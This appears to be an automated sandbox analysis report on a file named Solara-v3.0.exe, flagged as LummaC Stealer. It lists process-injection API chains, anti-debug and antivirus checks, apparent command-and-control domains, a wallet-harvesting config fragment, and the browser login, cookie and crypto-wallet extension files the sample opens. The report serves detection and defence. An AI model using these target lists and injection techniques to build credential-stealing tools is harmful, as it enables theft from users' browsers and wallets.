                    Source: Solara-v3.0.exe, 00000004.00000002.3287402919.000000000331A000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2094482901.0000000003322000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2117409999.0000000003320000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2219935945.000000000331A000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2257697747.000000000331A000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2880236933.000000000331A000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000002.3287249240.00000000032CC000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2215763251.000000000331A000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2193850105.000000000331F000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2279803555.000000000331A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005AC3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: Solara-v3.0.exe, 00000004.00000003.2141739925.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeAPI call chain: ExitProcess graph end nodegraph_4-13953
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 4_2_0043CD20 LdrInitializeThunk,4_2_0043CD20
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00C9F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C9F8E9
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00CCA19E mov edi, dword ptr fs:[00000030h]0_2_00CCA19E
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00C91FB0 mov edi, dword ptr fs:[00000030h]0_2_00C91FB0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 3_2_00C91FB0 mov edi, dword ptr fs:[00000030h]3_2_00C91FB0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00CAD8E0 GetProcessHeap,0_2_00CAD8E0
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00C9F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C9F52D
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00C9F8DD SetUnhandledExceptionFilter,0_2_00C9F8DD
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00C9F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C9F8E9
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00CA7E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CA7E30
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 3_2_00C9F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00C9F52D
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 3_2_00C9F8DD SetUnhandledExceptionFilter,3_2_00C9F8DD
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 3_2_00C9F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00C9F8E9
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 3_2_00CA7E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00CA7E30

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Contains functionality to inject code into remote processes
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00CCA19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00CCA19E
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeMemory written: C:\Users\user\Desktop\Solara-v3.0.exe base: 400000 value starts with: 4D5AJump to behavior
                    LummaC encrypted strings found
                    Source: Solara-v3.0.exe, 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hummskitnj.buzz
                    Source: Solara-v3.0.exe, 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cashfuzysao.buzz
                    Source: Solara-v3.0.exe, 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: appliacnesot.buzz
                    Source: Solara-v3.0.exe, 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: screwamusresz.buzz
                    Source: Solara-v3.0.exe, 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: inherineau.buzz
                    Source: Solara-v3.0.exe, 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: scentniej.buzz
                    Source: Solara-v3.0.exe, 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rebuildeso.buzz
                    Source: Solara-v3.0.exe, 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: prisonyfork.buzz
                    Source: Solara-v3.0.exe, 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: mindhandru.buzz
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeProcess created: C:\Users\user\Desktop\Solara-v3.0.exe "C:\Users\user\Desktop\Solara-v3.0.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeProcess created: C:\Users\user\Desktop\Solara-v3.0.exe "C:\Users\user\Desktop\Solara-v3.0.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: EnumSystemLocalesW,0_2_00CAD1BD
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00CB1287
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: EnumSystemLocalesW,0_2_00CB14D8
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00CB1580
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: EnumSystemLocalesW,0_2_00CB17D3
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: GetLocaleInfoW,0_2_00CB1840
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: GetLocaleInfoW,0_2_00CB1960
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: EnumSystemLocalesW,0_2_00CB1915
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00CB1A07
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: GetLocaleInfoW,0_2_00CB1B0D
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: GetLocaleInfoW,0_2_00CACC15
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: EnumSystemLocalesW,3_2_00CAD1BD
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_00CB1287
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: EnumSystemLocalesW,3_2_00CB14D8
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00CB1580
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: EnumSystemLocalesW,3_2_00CB17D3
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: GetLocaleInfoW,3_2_00CB1840
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: GetLocaleInfoW,3_2_00CB1960
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: EnumSystemLocalesW,3_2_00CB1915
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00CB1A07
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: GetLocaleInfoW,3_2_00CB1B0D
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: GetLocaleInfoW,3_2_00CACC15
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeCode function: 0_2_00CA00B4 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_00CA00B4
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: Solara-v3.0.exe, 00000004.00000003.2219935945.000000000331A000.00000004.00000020.00020000.00000000.sdmp, Solara-v3.0.exe, 00000004.00000003.2220043538.0000000003308000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: Process Memory Space: Solara-v3.0.exe PID: 5668, type: MEMORYSTR
                    Source: Yara matchFile source: 4.2.Solara-v3.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.Solara-v3.0.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2033508060.0000000005059000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.3286876234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: Solara-v3.0.exe, 00000004.00000003.2219935945.000000000331A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                    Source: Solara-v3.0.exe, 00000004.00000003.2257759722.0000000003375000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wal
                    Source: Solara-v3.0.exe, 00000004.00000003.2219935945.000000000331A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                    Source: Solara-v3.0.exe, 00000004.00000003.2215880335.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
                    Source: Solara-v3.0.exe, 00000004.00000003.2215880335.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: Solara-v3.0.exe, 00000004.00000003.2215880335.0000000003332000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: Solara-v3.0.exe, 00000004.00000003.2219935945.000000000331A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                    Source: Solara-v3.0.exe, 00000004.00000003.2193726868.000000000336E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                    Source: Solara-v3.0.exe, 00000004.00000003.2257643086.000000000336F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                    Source: C:\Users\user\Desktop\Solara-v3.0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
